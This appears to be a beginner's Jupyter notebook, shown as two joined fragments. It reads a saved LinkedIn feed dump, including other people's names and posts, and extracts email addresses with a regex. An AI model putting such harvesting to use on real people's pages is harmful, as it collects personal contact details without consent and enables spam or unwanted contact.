"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"['<EMAIL>']\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"['<EMAIL>']\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"['<EMAIL>']\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"['<EMAIL>']\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n"
]
}
],
"source": [
"f = open(\"C:\\\\Users\\\\super\\Downloads\\\\Week 1 Test\\\\websiteData.txt\", \"r\", encoding=\"utf8\")\n",
"\n",
"for line in f:\n",
" \n",
" s = line.strip()\n",
" \n",
" \n",
" reg = re.findall(r\"[A-Za-z0-9._%+-]+\"\n",
" r\"@[A-Za-z0-9.-]+\"\n",
" r\"\\.[A-Za-z]{2,4}\", s)\n",
" \n",
" \n",
" print(reg)\n",
" \n",
" \n"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {},
"outputs": [],
"source": []
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {},
"outputs": [],
"source": []
}
],
"metadata": {
"kernelspec": {
"display_name": "Python 3",
"language": "python",
"name": "python3"
},
"language_info": {
"codemirror_mode": {
"name": "ipython",
"version": 3
},
"file_extension": ".py",
"mimetype": "text/x-python",
"name": "python",
"nbconvert_exporter": "python",
"pygments_lexer": "ipython3",
"version": "3.8.5"
}
},
"nbformat": 4,
"nbformat_minor": 4
} | emailScrap.py | {
"cells": [
{
"cell_type": "code",
"execution_count": 52,
"metadata": {},
"outputs": [],
"source": [
"import pandas as pd\n",
"import numpy as np\n",
"import re\n",
"import json"
]
},
{
"cell_type": "code",
"execution_count": 37,
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"0 notifications total\n",
"\n",
"Skip to search\n",
"\n",
"Skip to main content\n",
"\n",
"Close jump menu\n",
"Search\n",
"Primary Navigation\n",
"Home\n",
"My Network\n",
"<EMAIL> \n",
"Messaging\n",
"13\n",
"13 new notifications\n",
"Notifications\n",
"<NAME>\n",
"Me\n",
"\n",
"Work\n",
"Advertise\n",
"Photo of <NAME>\n",
"<NAME>\n",
"Senior Data Engineer\n",
"\n",
"Who viewed your profile\n",
"238\n",
"Views of your post\n",
"567\n",
"Access exclusive tools & insights\n",
"Retry Premium Free\n",
" My items\n",
"\n",
"Fort Services logo\n",
"Fort Services\n",
"Page notifications\n",
"5\n",
"Page visitors\n",
"1\n",
"See visitor analytics\n",
"Recent\n",
"\n",
"CX Network: Customer Experience, Service, Insight, Digital and Marketing Leaders\n",
"Data Analytics - Big Data • BI • SQL • Power BI • Tableau • RPA • Python • ML • AI • Azure • DevOps\n",
"Oracle Retail Q&A\n",
"Oracle Retail Analytics Professional\n",
"Use it or Lose it: Data Science Best Practices to Leverage AI/ML\n",
"GroupsSee all Groups\n",
"\n",
"CX Network: Customer Experience, Service, Insight, Digital and Marketing Leaders\n",
"Data Analytics - Big Data • BI • SQL • Power BI • Tableau • RPA • Python • ML • AI • Azure • DevOps\n",
"Oracle Retail Q&AShow more Show more Groups\n",
"EventsSee all Events Contact: <EMAIL> \n",
"\n",
"\n",
"Havard Business School - Startup Demo DaySee allSee all Events\n",
"Followed HashtagsSee all Followed Hashtags\n",
"Discover more\n",
"Visit profile for Rabindra Kharel\n",
"\n",
"Start a post\n",
"\n",
"Photo\n",
"\n",
"Video\n",
"Event\n",
"\n",
"Write article\n",
"\n",
"Sort by:\n",
"Top\n",
"Feed Updates\n",
"Feed post number 1\n",
"kshitij’s profile photo\n",
"<NAME> commented on this\n",
"\n",
"Anup NepalStatus is reachable\n",
"Anup Nepal\n",
"• 1st\n",
"Digital Transformation\n",
"7h • 7 hours ago\n",
"I’m happy to share that I’m starting a new position as Retail Optimization Lead at Tango Energy!\n",
"\n",
"Starting a New Position\n",
"likecelebrate\n",
"27\n",
"<NAME> and 26 others\n",
"8 comments\n",
"\n",
"Like\n",
"\n",
"Comment\n",
"\n",
"Share\n",
"\n",
"Send\n",
"<NAME>\n",
"\n",
"\n",
"\n",
"Open Emoji Keyboard\n",
"\n",
"Current selected sort order is Most relevant\n",
"Most relevant\n",
"<EMAIL> \n",
" 1st degree connection1st\n",
"Software Engineer\n",
"2h\n",
"Congrats bro!\n",
"\n",
"\n",
"Like\n",
"\n",
"Reply\n",
"\n",
"Load more comments\n",
"Feed post number 2\n",
"<NAME> follows Hevo Data\n",
"\n",
"Hevo Data\n",
"Hevo Data\n",
"33,425 followers\n",
"Promoted\n",
"There is an easier way to perform Redshift ETL.\n",
"\n",
"Find out how you can save time on engineering and research to set-up Redshift ETL with our cheatsheet.\n",
"…see more\n",
"\n",
"Free guide to Redshift ETL\n",
"hevodata.com\n",
"\n",
"Download. View Sponsored Content\n",
"Download\n",
"like\n",
"40\n",
"\n",
"Like\n",
"\n",
"Comment\n",
"\n",
"Share\n",
"\n",
"Send\n",
"\n",
"Be the first to comment on this\n",
"\n",
"Feed post number 3\n",
"Profile images for several LinkedIn members\n",
"Profile images for several LinkedIn membersProfile images for several LinkedIn members\n",
"<NAME> and <NAME> like this\n",
"\n",
"<NAME>Status is reachable\n",
"<NAME>\n",
"• 1st\n",
"Software Engineer\n",
"2d • 2 days ago\n",
"Just finished the course “Communicating with Confidence” by <NAME>! Check it out: https://lnkd.in/ejtCuJMK #publicspeaking #wellness.\n",
"\n",
"Certificate of Completion\n",
"linkedin.com • 1 min read\n",
"like\n",
"10\n",
"<NAME> and 9 others\n",
"\n",
"Like\n",
"\n",
"Comment\n",
"\n",
"Share\n",
"\n",
"Send\n",
"\n",
"Be the first to comment on this\n",
"\n",
"Feed post number 1\n",
"Aayush AdhikariStatus is online\n",
"<NAME>\n",
"• 1st\n",
"Machine Learning Data Scientist at DeepMind Creations Pvt Ltd\n",
"8h • Edited • 8 hours ago\n",
"\n",
"Hello all our company is opening for PAID INTERNSHIP on Flutter. If you are interested plz send your CV at <EMAIL>\n",
"\n",
"#flutter\n",
"#flutterdeveloper\n",
"#ml\n",
"#ai\n",
"…see more\n",
"likesupport\n",
"12\n",
"1 comment\n",
"\n",
"Like\n",
"\n",
"Comment\n",
"\n",
"Share\n",
"\n",
"Send\n",
"Feed post number 2\n",
"Jobs recommended for you\n",
"\n",
"View job: Senior Data Engineer\n",
"\n",
"Recruiting from Scratch\n",
"Senior Data Engineer\n",
"Recruiting from Scratch\n",
"Vancouver, British Columbia, Canada\n",
"\n",
"1 month ago\n",
"View job: Senior Data Engineer - Scala/AWS\n",
"\n",
"Jobot\n",
"Senior Data Engineer - Scala/AWS\n",
"Jobot\n",
"Vancouver, British Columbia, Canada\n",
"\n",
"1 week ago • Easy Apply\n",
"View job: Senior Big Data Engineer\n",
"\n",
"Emonics LLC\n",
"Senior Big Data Engineer\n",
"Emonics LLC\n",
"Vancouver, British Columbia, Canada\n",
"send email to <EMAIL> \n",
"\n",
"3 days ago • Easy Apply\n",
"\n",
"See moreSee more\n",
"Feed post number 3\n",
"Santosh’s profile photo\n",
"Santosh Pandey likes this\n",
"\n",
"<NAME>\n",
"<NAME>\n",
"• 3rd+\n",
"☀️ Solving for Future of Work | People Engagement\n",
"3d • 3 days ago\n",
"Follow\n",
"Hypocrisy 101\n",
"\n",
"\"How soon can you join? We need somebody who can join within a week.\"\n",
"\n",
"\"You'll need to serve 3 months of notice period, we can't do anything about it.\"\n",
"\n",
"If the employee is so important to you that you need 3 months to replace them, you should've treated them well in the first place - and they probably wouldn't have left.\n",
"\n",
"A smooth exit process is underrated.\n",
"\n",
"Do it well, and the employee might consider returning in the future.\n",
"\n",
"Make it complicated, and the employee will ensure that none of their friends/acquaintances ends up joining your company ever again. 🙃\n",
"\n",
"Curious, how was your exit process in your previous org?\n",
"\n",
"#noticeperiod #offboarding #employeeexperience\n",
"…see more\n",
"\n",
"No alternative text description for this imageActivate to view larger image\n",
"likecelebratesupport agent <EMAIL> \n",
"1,420\n",
"<NAME> and 1,419 others\n",
"87 comments\n",
"\n",
"Like\n",
"\n",
"Comment\n",
"\n",
"Share\n",
"\n",
"Send\n",
"Feed post number 4\n",
"<NAME>, <NAME> and 136 other connections follow The British College, Kathmandu\n",
"\n",
"The British College, Kathmandu\n",
"The British College, Kathmandu\n",
"4,662 followers\n",
"Promoted\n",
"TBC is proud to announce the second series of the TBC Distinguished Guest Lecture Series with Prof <NAME> & Dr <NAME>. The topic of the session: \"Innovation, Development & Covid 19: Post Pandemic Context for Nepal.\"\n",
"RSVP: https://bit.ly/33jYiV1\n",
"…see more\n",
"No alternative text description for this image\n",
"TBC Distinguished Guest Lecture Series II\n",
"Apply Now. View Sponsored Content\n",
"Apply Now\n",
"No alternative text description for this image\n",
"TBC Distinguished Guest Lecture Series II\n",
"Apply Now. View Sponsored Content\n",
"Apply Now\n",
"No alternative text description for this image\n",
"TBC Distinguished Guest Lecture Series II\n",
"Apply Now. View Sponsored Content\n",
"Apply Now\n",
"\n",
"like\n",
"25\n",
"\n",
"Like\n",
"\n",
"Comment\n",
"\n",
"Share\n",
"\n",
"Send\n",
"\n",
"Be the first to comment on this\n",
"\n",
"Feed post number 5\n",
"Congratulate <NAME> on their work anniversary\n",
"\n",
"<NAME>\n",
"<NAME>\n",
"• 1st\n",
"CEO and Founder at SoftNEP\n",
"1d1 day ago\n",
"Celebrating 17 years at SoftNEP Pvt Ltd\n",
"celebratelike\n",
"2\n",
"\n",
"Congrats Sunil\n",
"\n",
"Time flies!\n",
"\n",
"Kudos to you\n",
"\n",
"Wow!\n",
"\n",
"What an achievement!\n",
"\n",
"Great work!\n",
"\n",
"Wow, 17 years already?\n",
"\n",
"Scroll right\n",
"\n",
"Like\n",
"\n",
"Comment\n",
"<NAME>\n",
"\n",
"\n",
"\n",
"Open Emoji Keyboard\n",
"\n",
"Feed post number 6\n",
"Lekhanath’s profile photo\n",
"<NAME> commented on this\n",
"\n",
"<NAME>\n",
"<NAME>\n",
"• 3rd+\n",
"Director, Eurest\n",
"3d • 3 days ago\n",
"I am looking to fill the following jobs:\n",
"<NAME>\n",
"<NAME>\n",
"Prep Cook\n",
"\n",
"Monday-Friday\n",
"<NAME>\n",
"PM me for details\n",
"…see more\n",
"likelove\n",
"166\n",
"132 comments\n",
"\n",
"Like\n",
"\n",
"Comment\n",
"\n",
"Share\n",
"\n",
"Send\n",
"<NAME>\n",
"\n",
"\n",
"\n",
"Open Emoji Keyboard\n",
"\n",
"Current selected sort order is Most relevant\n",
"Most relevant\n",
"See profile for Lekhanath BhandariStatus is reachable\n",
"<NAME>\n",
" 1st degree connection1st\n",
"sous chef at fazlani nature nest\n",
"1d\n",
"Interested for sous chef\n",
"\n",
"\n",
"Like\n",
"\n",
"Reply\n",
"\n",
"Load more comments\n",
"Feed post number 7\n",
"Bibek’s profile photo\n",
"<NAME> likes this\n",
"\n",
"<NAME>Status is reachable\n",
"<NAME>\n",
"• 2nd\n",
"CEO, Innovation and Growth at Trinity Consulting - Founder, InfluencerActive, the World's First B2B Influencer Marketplace\n",
"12h • 12 hours ago\n",
"Follow\n",
"Turn your plants into pets!\n",
"\n",
"Play\n",
"Back to start of video\n",
"Skip back 10 seconds\n",
"Skip ahead 10 seconds\n",
"Current time 0:00/Duration 0:45\n",
" \n",
"1x\n",
"\n",
"Playback speed\n",
"\n",
"Unmute\n",
"\n",
"Turn fullscreen on\n",
"likeloveinsightful\n",
"9,044\n",
"<NAME> and 9,043 others\n",
"257 comments\n",
"\n",
"Like\n",
"\n",
"Comment\n",
"\n",
"Share\n",
"\n",
"Send\n",
"Feed post number 1\n",
"Larange’s profile photo\n",
"<NAME> likes this\n",
"\n",
"<NAME>\n",
"<NAME>\n",
"• 2nd\n",
"Research Scientist at Google DeepMind • Advisor at AlphaSignal.ai\n",
"1d • Edited • 1 day ago\n",
"Follow\n",
"Hi all!\n",
"We're currently looking for a part time (4 hours/week) Computer Science PhD or Masters student to help us at https://alphasignal.ai\n",
"\n",
"A few criteria:\n",
"-Must be between timezones GMT+5 (India) to GMT+9 (Japan).\n",
"-Published at least one research paper in Machine Learning.\n",
"-Has some familiarity with Pytorch, Tensorflow.\n",
"-Knows the difference between RNN, CNN, LSTM, GANs.\n",
"-Familiarity with Deep Learning terms.\n",
"-Knows about Meta AI, Deepmind, Google AI, OpenAI and other big players.\n",
"\n",
"That's it!\n",
"If you know a student who fits the role send it my way :)\n",
"\n",
"It's definitely a resume-booster.\n",
"…see more\n",
"likesupportcurious\n",
"432\n",
"<NAME> and 431 others\n",
"102 comments\n",
"\n",
"Like\n",
"\n",
"Comment\n",
"\n",
"Share\n",
"\n",
"Send\n",
"Feed post number 2\n",
"<NAME> and <NAME> follow Spot by NetApp\n",
"\n",
"Spot by NetApp\n",
"Spot by NetApp\n",
"11,440 followers\n",
"Promoted\n",
"Download our free digital guide to Microsoft Azure. Learn best practices for architecting and managing efficient, scalable cloud infrastructure built to accelerate your business\n",
"…see more\n",
"\n",
"Getting Started with Azure Cloud Infrastructure – Get the PDF Guide\n",
"get.spot.io\n",
"\n",
"Download. View Sponsored Content\n",
"Download\n",
"like\n",
"30\n",
"\n",
"Like\n",
"\n",
"Comment\n",
"\n",
"Share\n",
"\n",
"Send\n",
"\n",
"Be the first to comment on this\n",
"\n",
"Feed post number 3\n",
"Everest’s profile photo\n",
"Everest K.C. likes this\n",
"\n",
"<NAME>\n",
"<NAME>\n",
"• 2nd\n",
"System Administrator\n",
"6h • Edited • 6 hours ago\n",
"<NAME> is an extremely experienced DevOps engineer. He has an intelligent teaching method, Start teaching from the very basics to taking to a stage where you build real-world solutions and debug challenges. The designed labs were great and worked as expected without a hitch. Thanks, owlocular to give me this certificate.\n",
"…see more\n",
"Your document has finished loading\n",
"likecelebratelove\n",
"6\n",
"Everest K.C. and 5 others\n",
"1 comment\n",
"\n",
"Like\n",
"\n",
"Comment\n",
"\n",
"Share\n",
"\n",
"Send\n",
"Feed post number 4\n",
"Lalit’s profile photo\n",
"<NAME> commented on this\n",
"\n",
"<NAME>\n",
"<NAME>\n",
"• 3rd+\n",
"Commissioning Manager - Process | Commissioning Expert | Troubleshooting Expert for O&M|\n",
"20h • 20 hours ago\n",
"Riyadh AldhaleaiStatus is reachable\n",
"Riy<NAME>\n",
"• 3rd+\n",
"Manager -Manpower Services at AlMansoori Specialized Engineering\n",
"3d • 3 days ago\n",
"Follow\n",
"small test for your focus\n",
"whats is the Number inside the circle?\n",
"\n",
"Image previewActivate to view larger image\n",
"like\n",
"4\n",
"18 comments\n",
"\n",
"Like\n",
"\n",
"Comment\n",
"\n",
"Share\n",
"\n",
"Send\n",
"<NAME>\n",
"\n",
"\n",
"\n",
"Open Emoji Keyboard\n",
"\n",
"Current selected sort order is Most relevant\n",
"Most relevant\n",
"See profile for Lalit SharmaStatus is reachable\n",
"L<NAME>\n",
" 1st degree connection1st\n",
"Team Leader cum Senior Highway Engineer\n",
"1h\n",
"45283\n",
"\n",
"\n",
"Like\n",
"\n",
"Reply\n",
"\n",
"Load more comments\n",
"Feed post number 5\n",
"Sammeer’s profile photo\n",
"<NAME> loves this\n",
"\n",
"<NAME>, Ph.D\n",
"<NAME>, Ph.D\n",
"• 2nd\n",
"Social Media Marketing|Please click FOLLOW button for the latest development in Civil Engineering || 230K+ Followers ||\n",
"23h • 23 hours ago\n",
"Follow\n",
" What Causes Breakdowns in Traffic Flow?\n",
"\n",
"The layman's definition of congestion is \"too many cars trying to use a highway at the same time\". Transportation engineers formalize this idea as capacity—the ability to move vehicles past a point over a given span of time. When the capacity of a highway section is exceeded, traffic flow breaks down, speeds drop, and vehicles crowd together. These actions cause traffic to back up behind the disruption.\n",
"\n",
"Basically, there are three types of traffic flow behavior that will cause traffic flow to break down:\n",
"\n",
"1- \"Bunching\" of vehicles as a result of reduced speed.\n",
"2- Intended Interruption to Traffic Flow.\n",
"3- Vehicle Merging Maneuvers. \n",
"\n",
"With all this information, I believe this dog got the concept and found the solution better than me as a Highway engineer ;)\n",
"\n",
"If you found the content informative, you may Follow me by <NAME>, Ph.D for more!\n",
"\n",
"Video Credit: IG @ earthdixe\n",
".......................................................................\n",
"All rights and credits are reserved to the respective owner(s). If you are the main copyright owner rather than the one mentioned here of this content, contact me to claim credit or content removal.\n",
"\n",
"Check out #mehrtashsoltani for educational and practical content in civil engineering!\n",
"…see more\n",
"\n",
"Pause\n",
"Back to start of video\n",
"Skip back 10 seconds\n",
"Skip ahead 10 seconds\n",
"Current time 0:04/Duration 0:18\n",
" \n",
"1x\n",
"\n",
"Playback speed\n",
"\n",
"Unmute\n",
"\n",
"Turn fullscreen on\n",
"likelovecelebrate\n",
"3,781\n",
"<NAME> and 3,780 others\n",
"178 comments\n",
"\n",
"Like\n",
"\n",
"Comment\n",
"\n",
"Share\n",
"\n",
"Send\n",
"Feed post number 6\n",
"Supermetrics\n",
"Supermetrics\n",
"13,205 followers\n",
"Promoted\n",
"\n",
"Supermetrics has been listed on G2 as the highest rated marketing data pipeline company of 2022.\n",
"\n",
"Over 17,000 companies already use Supermetrics to streamline marketing reports.\n",
"\n",
"Join our happy customers and start your free trial today!\n",
"…see more\n",
"\n",
"Start your free trial today\n",
"supermetrics.comRegister. View Sponsored Content\n",
"Register\n",
"likelove\n",
"61\n",
"1 comment\n",
"\n",
"Like\n",
"\n",
"Comment\n",
"\n",
"Share\n",
"\n",
"Send\n",
"Feed post number 7\n",
"Samundra’s profile photo\n",
"<NAME> loves this\n",
"\n",
"<NAME>\n",
"<NAME>\n",
"• 2nd\n",
"Here to write. If it goes viral, it's not because of me. It's because it's true.\n",
"3d • 3 days ago\n",
"Follow\n",
"\n",
"No alternative text description for this imageActivate to view larger image\n",
"likelovecelebrate\n",
"68,665\n",
"<NAME> and 68,664 others\n",
"1,154 comments\n",
"\n",
"Like\n",
"\n",
"Comment\n",
"\n",
"Share\n",
"\n",
"Send\n",
"\n",
"Show more results\n",
"Add to your feed\n",
"\n",
"National Association of REALTORS®;<EMAIL> \n",
"National Association of REALTORS®\n",
"Company • Real Estate\n",
"\n",
"Follow\n",
"<NAME>\n",
"<NAME>\n",
"Bestselling Author | Host of the Women & Money Podcast | Co-Founder of SecureSave\n",
"\n",
"Follow\n",
"National Association of Home Builders\n",
"National Association of Home Builders\n",
"Company • Construction\n",
"\n",
"Follow\n",
"View all recommendations \n",
"\n",
"About\n",
"Accessibility\n",
"Help Center\n",
"\n",
"Privacy & Terms \n",
"Ad Choices\n",
"Advertising\n",
"\n",
"Business Services \n",
"Get the LinkedIn app\n",
"More\n",
" LinkedIn Corporation © 2022 <EMAIL> \n",
"<NAME>Status is online\n",
"MessagingYou are on the messaging overlay. Press enter to open the list of conversations.\n",
"\n",
"\n",
"Compose message\n",
"\n",
"You are on the messaging overlay. Press enter to open the list of conversations.\n",
"\n"
]
}
],
"source": [
"\n",
"f = open(\"C:\\\\Users\\\\super\\Downloads\\\\Week 1 Test\\\\websiteData.txt\", \"r\", encoding=\"utf8\")\n",
"print(f.read())"
]
},
{
"cell_type": "code",
"execution_count": 67,
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"['<EMAIL>']\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"['<EMAIL>']\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"['<EMAIL>']\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"['<EMAIL>']\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"['<EMAIL>']\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"['<EMAIL>']\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
